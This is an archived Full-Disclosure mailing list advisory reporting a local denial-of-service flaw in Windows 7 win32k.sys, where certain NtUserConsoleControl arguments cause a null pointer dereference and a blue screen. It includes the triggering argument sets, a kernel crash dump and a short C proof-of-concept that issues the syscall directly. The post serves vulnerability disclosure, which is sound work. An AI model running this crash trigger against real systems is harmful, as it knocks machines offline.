lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 29 Jun 2018 12:42:00 +0200
From: Victor Portal Gonzalez <vportalg@...il.com>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com
Subject: [FD] Windows Kernel (win32k.sys) Local Denial Of Service

Hello,

It is possible to trigger a BSOD caused by a Null pointer deference when
calling the system call NtUserConsoleControl with the following arguments:

   - NtUserControlConsole(1,0,8).
   - NtUserControlConsole(4,0,8).
   - NtUserControlConsole(6,0,12).
   - NtUserControlConsole(2,0,12).
   - NtUserControlConsole(3,0,20).
   - NtUserControlConsole(5,0,8).

Different crashes are reproduced for each case. For the second case the
crash is showed below:




*EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace
referencia a la memoria en 0x%08lx. La memoria no se pudo %s.FAULTING_IP:
win32k!xxxSetConsoleCaretInfo+*







*c93310641 8b0e            mov     ecx,dword ptr [esi]TRAP_FRAME:  8c747b2c
-- (.trap 0xffffffff8c747b2c)ErrCode = 00000000eax=00000000 ebx=00000000
ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003eip=93310641
esp=8c747ba0 ebp=8c747bb0 iopl=0         nv up ei ng nz ac po nccs=0008
ss=0010  ds=0023  es=0023  fs=0030  gs=0000
efl=00010292win32k!xxxSetConsoleCaretInfo+*
















*0xc:93310641 8b0e            mov     ecx,dword ptr [esi]
ds:0023:00000000=????????Resetting default scopeCUSTOMER_CRASH_COUNT:
1DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULTBUGCHECK_STR:  0x8EPROCESS_NAME:
Win32k-fuzzer_CURRENT_IRQL:  0LAST_CONTROL_TRANSFER:  from 9330fc27 to
93310641STACK_TEXT:  8c747bb0 9330fc27 00000000 00000003 00000014
win32k!xxxSetConsoleCaretInfo+*

*0xc8c747bcc 9330fa8d 00000003 00000000 00000014
win32k!xxxConsoleControl+0x1478c747c20 82848b8e 00000003 00000000 00000014
win32k!NtUserConsoleControl+*








*0xc58c747c20 012e6766 00000003 00000000 00000014
nt!KiSystemServicePostCallWARNING: Frame IP not in any known module.
Following frames may be wrong.0016f204 00000000 00000000 00000000 00000000
0x12e6766STACK_COMMAND:  kbFOLLOWUP_IP: win32k!xxxSetConsoleCaretInfo+*




*c93310641 8b0e            mov     ecx,dword ptr [esi]SYMBOL_STACK_INDEX:
0SYMBOL_NAME:  win32k!xxxSetConsoleCaretInfo+*









*cFOLLOWUP_NAME:  MachineOwnerMODULE_NAME: win32kIMAGE_NAME:
win32k.sysDEBUG_FLR_IMAGE_TIMESTAMP:  5accdebcFAILURE_BUCKET_ID:
0x8E_win32k!*

*xxxSetConsoleCaretInfo+cBUCKET_ID:  0x8E_win32k!*





*xxxSetConsoleCaretInfo+cFollowup: MachineOwner---------kd> r
esiesi=00000000*




*PoC code:*

*#include <Windows.h>*


*extern "C"*

*ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {*

* __asm{mov eax, ApiNumber};*

* __asm{lea edx, ApiNumber + 4};*

* __asm{int 0x2e};*

*}*


*int _tmain(int argc, _TCHAR* argv[])*

*{*

* int st = 0;*

* int syscall_ID = 0x1160; //NtUserControlConsole Windows 7*

*LoadLibrary(L"user32.dll");*


* st = (int)SystemCall32(syscall_ID, 4, 0, 8);*

* return 0;*

*}*


The vulnerability has only been tested  in Windows 7 x86.
CVSS Base Score: 5.5
As the vulnerability not meet the bar that Microsoft has for servicing, not
patch will be released.

Best regards,
Victor Portal

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists